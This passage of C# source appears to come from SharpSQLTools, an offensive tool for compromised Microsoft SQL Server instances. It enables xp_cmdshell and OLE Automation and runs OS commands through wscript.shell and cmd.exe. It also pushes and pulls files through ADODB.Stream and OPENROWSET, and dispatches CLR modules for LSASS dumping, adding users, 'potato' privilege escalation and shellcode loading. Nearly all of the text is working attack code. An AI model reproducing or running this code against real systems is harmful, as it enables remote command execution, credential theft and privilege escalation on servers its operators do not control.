88 | public static string GetTimeStamp() 89 | { 90 | TimeSpan ts = DateTime.UtcNow - new DateTime(1970, 1, 1, 0, 0, 0, 0); 91 | return Convert.ToInt64(ts.TotalMilliseconds).ToString(); 92 | } 93 | 94 | ///

95 | /// sp_oacreate 执行命令 96 | ///

97 | /// 命令 98 | static void sp_shell(String Command) 99 | { 100 | if (setting.Check_configuration("Ole Automation Procedures", 0) && !setting.Enable_ola()) 101 | { 102 | return; 103 | } 104 | string sqlstr = String.Format(@" 105 | declare @shell int,@exec int,@text int,@str varchar(8000); 106 | exec sp_oacreate 'wscript.shell',@shell output 107 | exec sp_oamethod @shell,'exec',@exec output,'c:\windows\system32\cmd.exe /c {0}' 108 | exec sp_oamethod @exec, 'StdOut', @text out; 109 | exec sp_oamethod @text, 'ReadAll', @str out 110 | select @str", Command); 111 | Console.WriteLine(Batch.RemoteExec(Conn, sqlstr, true)); 112 | } 113 | 114 | ///

115 | /// clr_exec 执行命令 116 | ///

117 | /// 命令 118 | static void clr_exec(String Command) 119 | { 120 | sqlstr = String.Format("exec dbo.ClrExec '{0}'", Command); 121 | Batch.CLRExec(Conn, sqlstr); 122 | } 123 | 124 | 125 | static byte[] ReadFileToByte(string filePath) 126 | { 127 | byte[] result; 128 | try 129 | { 130 | using (FileStream fileStream = new FileStream(filePath, FileMode.Open, FileAccess.Read)) 131 | { 132 | byte[] array = new byte[fileStream.Length]; 133 | fileStream.Read(array, 0, array.Length); 134 | result = array; 135 | } 136 | } 137 | catch 138 | { 139 | result = null; 140 | } 141 | return result; 142 | } 143 | 144 | static private List SplitFileSize(int fileSize, int splitLength) 145 | { 146 | List list = new List(); 147 | if (fileSize > splitLength) 148 | { 149 | int num = fileSize / splitLength; 150 | int num2 = fileSize % splitLength; 151 | if (num > 0) 152 | { 153 | for (int i = 0; i < num; i++) 154 | { 155 | list.Add(splitLength); 156 | } 157 | if (num2 != 0) 158 | { 159 | list.Add(num2); 160 | } 161 | } 162 | } 163 | else 164 | { 165 | list.Add(fileSize); 166 | } 167 | return list; 168 | } 169 | 170 | ///

171 | /// 文件上传，使用 OLE Automation Procedures 的 ADODB.Stream 172 | ///

173 | /// 本地文件 174 | /// 远程文件 175 | static void UploadFiles(String localFile, String remoteFile) 176 | { 177 | Console.WriteLine(String.Format("[*] Uploading '{0}' to '{1}'...", localFile, remoteFile)); 178 | 179 | if (setting.Check_configuration("Ole Automation Procedures", 0) && !setting.Enable_ola()) 180 | { 181 | return; 182 | } 183 | byte[] byteArray = ReadFileToByte(localFile); 184 | string text = "copy /b "; 185 | if (setting.File_Exists(remoteFile, 1)) 186 | { 187 | Console.WriteLine("[+] {0} Exists", remoteFile); 188 | return; 189 | } 190 | int num = 0; 191 | int num2 = 0; 192 | int splitLength = 250000; 193 | List list = SplitFileSize(byteArray.Length, splitLength); 194 | try 195 | { 196 | foreach (int num3 in list) 197 | { 198 | string text2 = string.Format("{0}_{1}.config_txt", remoteFile, num); 199 | byte[] array = new byte[num3]; 200 | Array.Copy(byteArray, num2, array, 0, num3); 201 | string hexstr = string.Concat(from b in array 202 | select b.ToString("X2")); 203 | sqlstr = String.Format(@" 204 | DECLARE @ObjectToken INT 205 | EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT 206 | EXEC sp_OASetProperty @ObjectToken, 'Type', 1 207 | EXEC sp_OAMethod @ObjectToken, 'Open' 208 | EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x{0} 209 | EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL,'{1}', 2 210 | EXEC sp_OAMethod @ObjectToken, 'Close' 211 | EXEC sp_OADestroy @ObjectToken", hexstr, text2); 212 | Batch.RemoteExec(Conn, sqlstr, false); 213 | num2 += num3; 214 | num++; 215 | text = text + "\"" + text2 + "\"+"; 216 | Thread.Sleep(1000); 217 | if (setting.File_Exists(text2, 1)) 218 | { 219 | Console.WriteLine("[+] {0}_{1}.config_txt Upload completed", remoteFile, num); 220 | } 221 | else 222 | { 223 | Console.WriteLine("[!] {0}_{1}.config_txt Error uploading", remoteFile, num); 224 | Conn.Close(); 225 | Environment.Exit(0); 226 | } 227 | 228 | Thread.Sleep(1000); 229 | } 230 | 231 | text = text.Trim(new char[] 232 | { 233 | '+' 234 | }) + " \"" + remoteFile + "\"'"; 235 | string shell = String.Format(@" 236 | DECLARE @SHELL INT 237 | EXEC sp_oacreate 'wscript.shell', @SHELL OUTPUT 238 | EXEC sp_oamethod @SHELL, 'run' , NULL, 'c:\windows\system32\cmd.exe /c "); 239 | 240 | Console.WriteLine(@"[+] copy /b {0}_x.config_txt {0}", remoteFile); 241 | Batch.RemoteExec(Conn,shell + text, false); 242 | Thread.Sleep(1000); 243 | 244 | if (setting.File_Exists(remoteFile, 1)) 245 | { 246 | sqlstr = String.Format(@"del {0}*.config_txt'", remoteFile.Replace(Path.GetFileName(remoteFile), "")); 247 | Console.WriteLine("[+] {0}", sqlstr.Replace("'", "")); 248 | Batch.RemoteExec(Conn, shell + sqlstr, false); 249 | Console.WriteLine("[*] '{0}' Upload completed", localFile); 250 | } 251 | //setting.Disable_ole(); 252 | } 253 | catch (Exception ex) 254 | { 255 | Conn.Close(); 256 | Console.WriteLine("[!] Error log: \r\n" + ex.Message); 257 | } 258 | } 259 | 260 | ///

261 | /// 文件下载，使用 OPENROWSET + BULK。将 memoryStream 直接写入文件 262 | ///

263 | /// 远程文件 264 | /// 本地文件 265 | static void DownloadFiles(String localFile, String remoteFile) 266 | { 267 | Console.WriteLine(String.Format("[*] Downloading '{0}' to '{1}'...", remoteFile, localFile)); 268 | 269 | if (!setting.File_Exists(remoteFile, 1)) 270 | { 271 | Console.WriteLine("[!] {0} file does not exist....", remoteFile); 272 | return; 273 | } 274 | 275 | sqlstr = String.Format(@"SELECT * FROM OPENROWSET(BULK N'{0}', SINGLE_BLOB) rs", remoteFile); // SINGLE_BLOB 选项将它们读取为二进制文件 276 | SqlCommand sqlComm = new SqlCommand(sqlstr, Conn); 277 | 278 | //接收查询到的sql数据 279 | using (SqlDataReader reader = sqlComm.ExecuteReader()) 280 | { 281 | //读取数据 282 | while (reader.Read()) 283 | { 284 | using (MemoryStream memoryStream = new MemoryStream((byte[])reader[0])) 285 | { 286 | using (FileStream fileStream = new FileStream(localFile, FileMode.Create, FileAccess.Write)) 287 | { 288 | byte[] bytes = new byte[memoryStream.Length]; 289 | memoryStream.Read(bytes, 0, (int)memoryStream.Length); 290 | fileStream.Write(bytes, 0, bytes.Length); 291 | } 292 | } 293 | } 294 | } 295 | 296 | Console.WriteLine("[*] '{0}' Download completed", remoteFile); 297 | } 298 | 299 | public static void OnInfoMessage(object mySender, SqlInfoMessageEventArgs args) 300 | { 301 | String value = String.Empty; 302 | foreach (SqlError err in args.Errors) 303 | { 304 | value = err.Message; 305 | Console.WriteLine(value); 306 | } 307 | } 308 | 309 | static void interactive(string[] args) 310 | { 311 | string target = args[0]; 312 | if (target.Contains(":")) 313 | { 314 | target = target.Replace(":", ","); 315 | } 316 | string username = args[1]; 317 | string password = args[2]; 318 | string database = args[3]; 319 | try 320 | { 321 | //sql建立连接 322 | string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target, database, username, password); 323 | Conn = new SqlConnection(connectionString); 324 | Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage); 325 | Conn.Open(); 326 | Console.WriteLine("[*] Database connection is successful!"); 327 | } 328 | catch (Exception ex) 329 | { 330 | Console.WriteLine("[!] Error log: \r\n" + ex.Message); 331 | Environment.Exit(0); 332 | } 333 | 334 | setting = new Setting(Conn); 335 | 336 | try 337 | { 338 | do 339 | { 340 | Console.Write("SQL> "); 341 | string str = Console.ReadLine(); 342 | if (str.ToLower() == "exit") { Conn.Close(); break; } 343 | else if (str.ToLower() == "help") { Help(); continue; } 344 | 345 | string[] cmdline = str.Split(new char[] { ' ' }, 3); 346 | 347 | switch (cmdline[0].ToLower()) 348 | { 349 | case "enable_xp_cmdshell": 350 | setting.Enable_xp_cmdshell(); 351 | break; 352 | case "disable_xp_cmdshell": 353 | setting.Disable_xp_cmdshell(); 354 | break; 355 | case "xp_cmdshell": 356 | { 357 | String s = String.Empty; 358 | for (int i = 1; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 359 | xp_shell(s); 360 | break; 361 | } 362 | case "sp_oacreate": 363 | { 364 | String s = String.Empty; 365 | for (int i = 1; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 366 | sp_shell(s); 367 | break; 368 | } 369 | case "upload": 370 | UploadFiles(cmdline[1], cmdline[2]); 371 | break; 372 | case "download": 373 | DownloadFiles(cmdline[2], cmdline[1]); 374 | break; 375 | case "enable_ole": 376 | setting.Enable_ola(); 377 | break; 378 | case "disable_ole": 379 | setting.Disable_ole(); 380 | break; 381 | case "clr_dumplsass": 382 | { 383 | String s = String.Empty; 384 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 385 | clr_exec(s); 386 | break; 387 | } 388 | case "clr_ls": 389 | { 390 | String s = String.Empty; 391 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 392 | clr_exec(s); 393 | break; 394 | } 395 | case "clr_cat": 396 | { 397 | String s = String.Empty; 398 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 399 | clr_exec(s); 400 | break; 401 | } 402 | case "clr_cd": 403 | { 404 | String s = String.Empty; 405 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 406 | clr_exec(s); 407 | break; 408 | } 409 | case "clr_rm": 410 | { 411 | String s = String.Empty; 412 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 413 | clr_exec(s); 414 | break; 415 | } 416 | case "clr_ping": 417 | { 418 | String s = String.Empty; 419 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 420 | clr_exec(s); 421 | break; 422 | } 423 | case "clr_netstat": 424 | clr_exec("clr_netstat"); 425 | break; 426 | case "clr_rdp": 427 | clr_exec("clr_rdp"); 428 | break; 429 | case "clr_getav": 430 | clr_exec("clr_getav"); 431 | break; 432 | case "clr_ps": 433 | clr_exec("clr_ps"); 434 | break; 435 | case "clr_pwd": 436 | clr_exec("clr_pwd"); 437 | break; 438 | case "clr_adduser": 439 | { 440 | String s = String.Empty; 441 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 442 | clr_exec(s); 443 | break; 444 | } 445 | case "clr_exec": 446 | { 447 | String s = String.Empty; 448 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 449 | clr_exec(s); 450 | break; 451 | } 452 | case "clr_efspotato": 453 | { 454 | String s = String.Empty; 455 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 456 | clr_exec(s); 457 | break; 458 | } 459 | case "clr_badpotato": 460 | { 461 | String s = String.Empty; 462 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 463 | clr_exec(s); 464 | break; 465 | } 466 | case "clr_scloader": 467 | { 468 | String s = String.Empty; 469 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 470 | clr_exec(s); 471 | break; 472 | } 473 | case "clr_scloader1": 474 | { 475 | String s = String.Empty; 476 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 477 | clr_exec(s); 478 | break; 479 | } 480 | case "clr_scloader2": 481 | { 482 | String s = String.Empty; 483 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 484 | clr_exec(s); 485 | break; 486 | } 487 | case "clr_download": 488 | { 489 | String s = String.Empty; 490 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 491 | clr_exec(s); 492 | break; 493 | } 494 | case "clr_combine": 495 | { 496 | String s = String.Empty; 497 | for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; } 498 | clr_exec(s); 499 | break; 500 | } 501 | case "enable_clr": 502 | setting.Enable_clr(); 503 | break; 504 | case "disable_clr": 505 | setting.Disable_clr(); 506 | break; 507 | case "install_clr": 508 | { 509 | setting.install_clr(); 510 | break; 511 | } 512 | case "uninstall_clr": 513 | setting.drop_clr(); 514 | break; 515 | default: 516 | Console.WriteLine(Batch.RemoteExec(Conn, str, true)); 517 | break; 518 | 519 | } 520 | if (!ConnectionState.Open.Equals(Conn.State)) 521 | { 522 | Console.WriteLine("[!] Disconnect...."); 523 | break; 524 | } 525 | } 526 | while (true); 527 | } 528 | catch (Exception ex) 529 | { 530 | Conn.Close(); 531 | Console.WriteLine("[!] Error log: \r\n" + ex.Message); 532 | } 533 | } 534 | 535 | static void Noninteractive(string[] args) 536 | { 537 | if (args.Length < 4) 538 | { 539 | Help(); 540 | return; 541 | } 542 | string target = args[0]; 543 | if (target.Contains(":")) 544 | { 545 | target = target.Replace(":", ","); 546 | } 547 | string username = args[1]; 548 | string password = args[2]; 549 | string database = args[3]; 550 | string module = args[4]; 551 | try 552 | { 553 | //sql建立连接 554 | string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target, database, username, password); 555 | Conn = new SqlConnection(connectionString); 556 | Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage); 557 | Conn.Open(); 558 | Console.WriteLine("[*] Database connection is successful!"); 559 | } 560 | catch (Exception ex) 561 | { 562 | Console.WriteLine("[!] Error log: \r\n" + ex.Message); 563 | Environment.Exit(0); 564 | } 565 | 566 | setting = new Setting(Conn); 567 | try 568 | { 569 | // string[] cmdline = str.Split(new char[] { ' ' }, 3); 570 | 571 | switch (module.ToLower()) 572 | { 573 | case "enable_xp_cmdshell": 574 | setting.Enable_xp_cmdshell(); 575 | break; 576 | case "disable_xp_cmdshell": 577 | setting.Disable_xp_cmdshell(); 578 | break; 579 | case "xp_cmdshell": 580 | { 581 | String command = String.Empty; 582 | if (args.Length > 6) 583 | { 584 | for (int i = 5; i < args.Length; i++) { command += args[i] + " "; } 585 | } 586 | else 587 | { 588 | command = args[5]; 589 | } 590 | xp_shell(command); 591 | break; 592 | } 593 | case "sp_oacreate": 594 | { 595 | { 596 | String command = String.Empty; 597 | if (args.Length > 6) 598 | { 599 | for (int i = 5; i < args.Length; i++) { command += args[i] + " "; } 600 | } 601 | else 602 | { 603 | command = args[5]; 604 | } 605 | sp_shell(command); 606 | break; 607 | } 608 | } 609 | case "upload": 610 | UploadFiles(args[5], args[6]); 611 | break; 612 | case "download": 613 | DownloadFiles(args[6], args[5]); 614 | break; 615 | case "enable_ole": 616 | setting.Enable_ola(); 617 | break; 618 | case "disable_ole": 619 | setting.Disable_ole(); 620 | break; 621 | case "clr_dumplsass": 622 | { 623 | String s = String.Empty; 624 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 625 | clr_exec(s); 626 | break; 627 | } 628 | case "clr_ping": 629 | { 630 | String s = String.Empty; 631 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 632 | clr_exec(s); 633 | break; 634 | } 635 | case "clr_cat": 636 | { 637 | String s = String.Empty; 638 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 639 | clr_exec(s); 640 | break; 641 | } 642 | case "clr_ls": 643 | { 644 | String s = String.Empty; 645 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 646 | clr_exec(s); 647 | break; 648 | } 649 | case "clr_cd": 650 | { 651 | String s = String.Empty; 652 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 653 | clr_exec(s); 654 | break; 655 | } 656 | case "clr_rm": 657 | { 658 | String s = String.Empty; 659 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 660 | clr_exec(s); 661 | break; 662 | } 663 | case "clr_pwd": 664 | clr_exec("clr_pwd"); 665 | break; 666 | case "clr_netstat": 667 | clr_exec("clr_netstat"); 668 | break; 669 | case "clr_ps": 670 | clr_exec("clr_ps"); 671 | break; 672 | case "clr_rdp": 673 | clr_exec("clr_rdp"); 674 | break; 675 | case "clr_getav": 676 | clr_exec("clr_getav"); 677 | break; 678 | case "clr_adduser": 679 | { 680 | String s = String.Empty; 681 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 682 | clr_exec(s); 683 | break; 684 | } 685 | case "clr_exec": 686 | { 687 | String s = String.Empty; 688 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 689 | clr_exec(s); 690 | break; 691 | } 692 | case "clr_efspotato": 693 | { 694 | String s = String.Empty; 695 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 696 | clr_exec(s); 697 | break; 698 | } 699 | case "clr_badpotato": 700 | { 701 | String s = String.Empty; 702 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 703 | clr_exec(s); 704 | break; 705 | } 706 | case "clr_scloader": 707 | { 708 | String s = String.Empty; 709 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 710 | clr_exec(s); 711 | break; 712 | } 713 | case "clr_scloader1": 714 | { 715 | String s = String.Empty; 716 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 717 | clr_exec(s); 718 | break; 719 | } 720 | case "clr_scloader2": 721 | { 722 | String s = String.Empty; 723 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 724 | clr_exec(s); 725 | break; 726 | } 727 | case "clr_download": 728 | { 729 | String s = String.Empty; 730 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 731 | clr_exec(s); 732 | break; 733 | } 734 | case "clr_combine": 735 | { 736 | String s = String.Empty; 737 | for (int i = 4; i < args.Length; i++) { s += args[i] + " "; } 738 | clr_exec(s); 739 | break; 740 | } 741 | case "enable_clr": 742 | setting.Enable_clr(); 743 | break; 744 | case "disable_clr": 745 | setting.Disable_clr(); 746 | break; 747 | case "install_clr": 748 | { 749 | setting.install_clr(); 750 | break; 751 | } 752 | case "uninstall_clr": 753 | setting.drop_clr(); 754 | break; 755 | default: 756 | Console.WriteLine(Batch.RemoteExec(Conn, args[3], true)); 757 | break; 758 | 759 | } 760 | if (!ConnectionState.Open.Equals(Conn.State)) 761 | { 762 | Console.WriteLine("[!] Disconnect...."); 763 | } 764 | Conn.Close(); 765 | } 766 | catch (Exception ex) 767 | { 768 | Conn.Close(); 769 | Console.WriteLine("[!] Error log: \r\n" + ex.Message); 770 | } 771 | } 772 | static void Main(string[] args) 773 | { 774 | if (args.Length == 4) 775 | { 776 | interactive(args); 777 | } 778 | else if (args.Length > 4) 779 | { 780 | Noninteractive(args); 781 | } 782 | else 783 | { 784 | logo(); 785 | Console.WriteLine("Usage:"); 786 | Console.WriteLine(@" 787 | SharpSQLTools target:port username password database - interactive console 788 | SharpSQLTools target:port username password database module command - non-interactive console"); 789 | Console.WriteLine("\nModule:"); 790 | Help(); 791 | return; 792 | } 793 | 794 | } 795 | } 796 | } 797 | --------------------------------------------------------------------------------